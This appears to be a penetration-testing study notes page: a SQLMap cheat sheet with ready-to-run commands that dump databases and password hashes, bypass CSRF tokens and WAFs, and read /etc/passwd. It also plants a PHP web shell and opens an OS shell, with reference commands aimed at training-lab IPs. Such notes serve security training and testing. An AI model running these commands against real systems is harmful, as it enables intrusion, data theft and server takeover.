🗺️SQLMap

Installation

sudo apt install sqlmap

Manual Installation

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Execution

python sqlmap.py
sqlmap -hh
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Flag:

-u: is used to provide the target URL
--batch: is used for skipping any required user-input

Testing POST

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Special marker *

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

Full HTTP Requests

Run SQLMap with an HTTP request file

sqlmap -r req.txt

Cookies

sqlmap -u "http://157.245.46.51:30545/case3.php" --cookie='id=1' -p 'id' --param-filter='COOKIE' --level=2 --dump --batch

Display Errors

--parse-errors

Prefix/Suffix

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Ref:

sqlmap -r req.txt --batch -T flag5 --no-cast --risk=3 --dump --technique=B
sqlmap -r req.txt --batch --dump --prefix='`)'
sqlmap -r req.txt --batch --dump --union-col=5 --no-cast

Basic DB Data Enumeration

Database version banner (switch --banner)
Current user name (switch --current-user)
Current database name (switch --current-db)
Checking if the current user has DBA (administrator) rights.

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Table Enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb

Tip: Apart from default CSV, we can specify the output format with the option --dump-format to HTML or SQLite, so that we can later further investigate the DB in an SQLite environment.

Table/Row Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

Conditional Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Full DB Enumeration

--dump-all --exclude-sysdbs

DB Schema Enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Searching for Data

sqlmap -u "http://www.example.com/?id=1" --search -T user

sqlmap -u "http://www.example.com/?id=1" --search -C pass

Password Enumeration and Cracking

sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users

DB Users Password Enumeration and Cracking

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Tip: The '--all' switch in combination with the '--batch' switch, will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.

Anti-CSRF Token Bypass

--csrf-token

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

--randomize

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI

Calculated Parameter Bypass

--eval

sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI

Ref:

sqlmap -u 'http://167.71.139.192:31141/case8.php' --data 'id=1&t0ken=wSQJPIxhc3AxIAaE8L2Jbas3OSlwkHjWdaolkgabU' --csrf-token="t0ken" -T flag8 --no-cast --dump
sqlmap -u 'http://167.71.139.192:31141/case9.php?id=1&uid=3022365281' --batch --randomize=uid -v 5 -T flag9 --dump --no-cast
sqlmap -u 'http://167.71.139.192:31141/case10.php' --data 'id=1' -p 'id' --random-agent --dump --batch --no-cast -T flag10
sqlmap -u 'http://167.71.139.192:31141/case11.php?id=1' -p 'id' --tamper=between --batch --dump --no-cast -T flag11

Checking for DBA Privileges

--is-dba

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

WAF Bypass

--skip-waf

Reading Local Files

--file-read

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Writing Local Files

--file-write
--file-dest

echo '<?php system($_GET["cmd"]); ?>' > shell.php

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

curl http://www.example.com/shell.php?cmd=ls+-la

OS Command Execution

--os-shell

sqlmap -u "http://www.example.com/?id=1" --os-shell

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Ref:

sqlmap -u 'http://167.71.139.140:32080/?id=1' --file-read '/var/www/html/flag.txt'
sqlmap -r req.txt -D <database> -T <table> --dump --batch --no-cast --tamper=between
--dump-all --batch --no-cast --exclude-sysdbs --random-agent --skip-waf --tamper=between

PreviousMySQL NextPython Regular Expression Quick Guide

Last updated 3 years ago

hashtagInstallation

hashtagManual Installation

hashtagExecution

hashtagTesting POST

hashtagSpecial marker *

hashtagFull HTTP Requests

hashtagRun SQLMap with an HTTP request file

hashtagCookies

hashtagDisplay Errors

hashtagPrefix/Suffix

hashtagBasic DB Data Enumeration

hashtagTable Enumeration

hashtagTable/Row Enumeration

hashtagConditional Enumeration

hashtagFull DB Enumeration

hashtagDB Schema Enumeration

hashtagSearching for Data

hashtagPassword Enumeration and Cracking

hashtagDB Users Password Enumeration and Cracking

hashtagAnti-CSRF Token Bypass

hashtagUnique Value Bypass

hashtagCalculated Parameter Bypass

hashtagChecking for DBA Privileges

hashtagWAF Bypass

hashtagReading Local Files

hashtagWriting Local Files

hashtagOS Command Execution

Installation

Manual Installation

Execution

Testing POST

Special marker *

Full HTTP Requests

Run SQLMap with an HTTP request file

Cookies

Display Errors

Prefix/Suffix

Basic DB Data Enumeration

Table Enumeration

Table/Row Enumeration

Conditional Enumeration

Full DB Enumeration

DB Schema Enumeration

Searching for Data

Password Enumeration and Cracking

DB Users Password Enumeration and Cracking

Anti-CSRF Token Bypass

Unique Value Bypass

Calculated Parameter Bypass

Checking for DBA Privileges

WAF Bypass

Reading Local Files

Writing Local Files

OS Command Execution